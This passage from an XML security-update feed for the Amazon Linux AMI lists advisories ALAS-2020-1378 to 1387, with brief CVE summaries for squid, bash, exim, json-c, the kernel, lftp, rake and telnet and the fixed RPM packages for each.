</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19319" title="" id="CVE-2019-19319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19768" title="" id="CVE-2019-19768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10751" title="" id="CVE-2020-10751" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12770" title="" id="CVE-2020-12770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1749" title="" id="CVE-2020-1749" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.181" release="108.257.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1378</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1378: important priority package update for squid</title><issued date="2020-06-01 12:25:00" /><updated date="2020-06-03 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11945:
An issue was discovered in Squid before 5.0.2. A remote attacker can replay a sniffed Digest Authentication nonce to gain access to resources that are otherwise forbidden. This occurs because the attacker can overflow the nonce reference counter (a short integer). Remote code execution may occur if the pooled token credentials are freed (instead of replayed as valid credentials).
1827563: CVE-2020-11945 squid: improper access restriction upon Digest Authentication nonce replay could lead to remote code execution
CVE-2019-12525:
An issue was discovered in Squid 3.3.9 through 3.5.28 and 4.x through 4.7. When Squid is configured to use Digest authentication, it parses the header Proxy-Authorization. It searches for certain tokens such as domain, uri, and qop. Squid checks if this token's value starts with a quote and ends with one. If so, it performs a memcpy of its length minus 2. Squid never checks whether the value is just a single quote (which would satisfy its requirements), leading to a memcpy of its length minus 1.
1730535: CVE-2019-12525 squid: parsing of header Proxy-Authentication leads to memory corruption
CVE-2019-12521:
An issue was discovered in Squid through 4.7. When Squid is parsing ESI, it keeps the ESI elements in ESIContext. ESIContext contains a buffer for holding a stack of ESIElements. When a new ESIElement is parsed, it is added via addStackElement. addStackElement has a check for the number of elements in this buffer, but it's off by 1, leading to a Heap Overflow of 1 element. The overflow is within the same structure so it can't affect adjacent memory blocks, and thus just leads to a crash while processing.
1827562: CVE-2019-12521 squid: off-by-one error in addStackElement allows for a heap buffer overflow and a crash
CVE-2019-12519:
An issue was discovered in Squid through 4.7. When handling the tag esi:when when ESI is enabled, Squid calls ESIExpression::Evaluate. This function uses a fixed stack buffer to hold the expression while it's being evaluated. When processing the expression, it could either evaluate the top of the stack, or add a new member to the stack. When adding a new member, there is no check to ensure that the stack won't overflow.
1827552: CVE-2019-12519 squid: improper check for new member in ESIExpression::Evaluate allows for stack buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12519" title="" id="CVE-2019-12519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12521" title="" id="CVE-2019-12521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525" title="" id="CVE-2019-12525" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11945" title="" id="CVE-2020-11945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1379</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1379: medium priority package update for bash</title><issued date="2020-06-23 05:55:00" /><updated date="2020-06-26 04:47:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9924:
rbash in Bash before 4.4-beta2 did not prevent the shell user from modifying BASH_CMDS, thus allowing the user to execute any command with the permissions of the shell.
1691774: CVE-2019-9924 bash: BASH_CMD is writable in restricted bash shells
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9924" title="" id="CVE-2019-9924" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.2.46-34.43.amzn1.i686.rpm</filename></package><package name="bash-doc" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.2.46-34.43.amzn1.i686.rpm</filename></package><package name="bash" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.2.46-34.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1380</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1380: important priority package update for exim</title><issued date="2020-06-23 05:57:00" /><updated date="2020-06-26 04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12783:
Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c.
1836362: CVE-2020-12783 exim: out-of-bounds read in the SPA authenticator can lead to SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12783" title="" id="CVE-2020-12783" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-mon-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1381</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1381: medium priority package update for json-c</title><issued date="2020-06-23 05:59:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12762:
json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.
1835253: CVE-2020-12762 json-c: integer overflow and out-of-bounds write via a large JSON file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12762" title="" id="CVE-2020-12762" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="json-c-debuginfo" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-debuginfo-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-doc" version="0.11" release="7.8.amzn1" epoch="0" arch="noarch"><filename>Packages/json-c-doc-0.11-7.8.amzn1.noarch.rpm</filename></package><package name="json-c" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-devel" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-devel-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-debuginfo" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-debuginfo-0.11-7.8.amzn1.i686.rpm</filename></package><package name="json-c" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-0.11-7.8.amzn1.i686.rpm</filename></package><package name="json-c-devel" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-devel-0.11-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1382</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1382: important priority package update for kernel</title><issued date="2020-06-23 06:02:00" /><updated date="2020-07-15 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12826:
A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.
1822077: CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process
CVE-2020-12657:
An issue was discovered in the Linux kernel before 5.6.5. There is a use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body.
1832866: CVE-2020-12657 kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body
CVE-2020-10711:
A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the 'ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service.
1825116: CVE-2020-10711 Kernel: NetLabel: null pointer dereference while receiving CIPSO packet with null category may cause kernel panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10711" title="" id="CVE-2020-10711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12657" title="" id="CVE-2020-12657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12826" title="" id="CVE-2020-12826" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1383</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1383: medium priority package update for lftp</title><issued date="2020-06-23 06:03:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10916:
It has been discovered that lftp up to and including version 4.8.3 does not properly sanitize remote file names, leading to a loss of integrity on the local system when reverse mirroring is used. A remote attacker may trick a user into using reverse mirroring against an attacker-controlled FTP server, resulting in the removal of all files in the current working directory on the victim's system.
1610349: CVE-2018-10916 lftp: particular remote file names may lead to the current working directory being erased
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10916" title="" id="CVE-2018-10916" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lftp" version="4.4.8" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/lftp-4.4.8-12.30.amzn1.x86_64.rpm</filename></package><package name="lftp-scripts" version="4.4.8" release="12.30.amzn1" epoch="0" arch="noarch"><filename>Packages/lftp-scripts-4.4.8-12.30.amzn1.noarch.rpm</filename></package><package name="lftp-debuginfo" version="4.4.8" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/lftp-debuginfo-4.4.8-12.30.amzn1.x86_64.rpm</filename></package><package name="lftp" version="4.4.8" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/lftp-4.4.8-12.30.amzn1.i686.rpm</filename></package><package name="lftp-debuginfo" version="4.4.8" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/lftp-debuginfo-4.4.8-12.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1384</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1384: medium priority package update for rubygem-rake</title><issued date="2020-06-23 06:05:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8130:
There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|`.
1816270: CVE-2020-8130 rake: OS Command Injection via egrep in Rake::FileList
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130" title="" id="CVE-2020-8130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem21-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem21-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem20-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem20-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem23-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem21-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem21-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem22-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem22-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem23-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem22-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem22-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem20-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem20-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1385</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1385: medium priority package update for rubygem24-rake</title><issued date="2020-06-23 06:06:00" 
/><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8130:
There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|`.
1816270: CVE-2020-8130 rake: OS Command Injection via egrep in Rake::FileList
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130" title="" id="CVE-2020-8130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem24-rake-doc" version="12.0.0" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rake-doc-12.0.0-1.49.amzn1.noarch.rpm</filename></package><package name="rubygem24-rake" version="12.0.0" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rake-12.0.0-1.49.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1386</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1386: important priority package update for squid</title><issued date="2020-06-23 06:08:00" /><updated date="2020-07-15 17:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11945:
An issue was discovered in Squid before 5.0.2. A remote attacker can replay a sniffed Digest Authentication nonce to gain access to resources that are otherwise forbidden. This occurs because the attacker can overflow the nonce reference counter (a short integer). Remote code execution may occur if the pooled token credentials are freed (instead of replayed as valid credentials).
1827563: CVE-2020-11945 squid: improper access restriction upon Digest Authentication nonce replay could lead to remote code execution
CVE-2019-13345:
The cachemgr.cgi web module of Squid through 4.7 has XSS via the user_name or auth parameter.
1727744: CVE-2019-13345 squid: XSS via user_name or auth parameter in cachemgr.cgi
CVE-2019-12525:
An issue was discovered in Squid 3.3.9 through 3.5.28 and 4.x through 4.7. When Squid is configured to use Digest authentication, it parses the header Proxy-Authorization. It searches for certain tokens such as domain, uri, and qop. Squid checks if this token's value starts with a quote and ends with one. If so, it performs a memcpy of its length minus 2. Squid never checks whether the value is just a single quote (which would satisfy its requirements), leading to a memcpy of its length minus 1.
1730535: CVE-2019-12525 squid: parsing of header Proxy-Authentication leads to memory corruption
CVE-2019-12519:
An issue was discovered in Squid through 4.7. When handling the tag esi:when when ESI is enabled, Squid calls ESIExpression::Evaluate. This function uses a fixed stack buffer to hold the expression while it's being evaluated. When processing the expression, it could either evaluate the top of the stack, or add a new member to the stack. When adding a new member, there is no check to ensure that the stack won't overflow.
1827552: CVE-2019-12519 squid: improper check for new member in ESIExpression::Evaluate allows for stack buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12519" title="" id="CVE-2019-12519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525" title="" id="CVE-2019-12525" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13345" title="" id="CVE-2019-13345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11945" title="" id="CVE-2020-11945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1387</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1387: important priority package update for telnet</title><issued date="2020-06-23 06:42:00" /><updated date="2020-06-26 
04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10188:
utility.c in telnetd in netkit telnet through 0.17 allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions.
1811673: CVE-2020-10188 telnet-server: no bounds checks in nextitem() function allow remote execution of arbitrary code
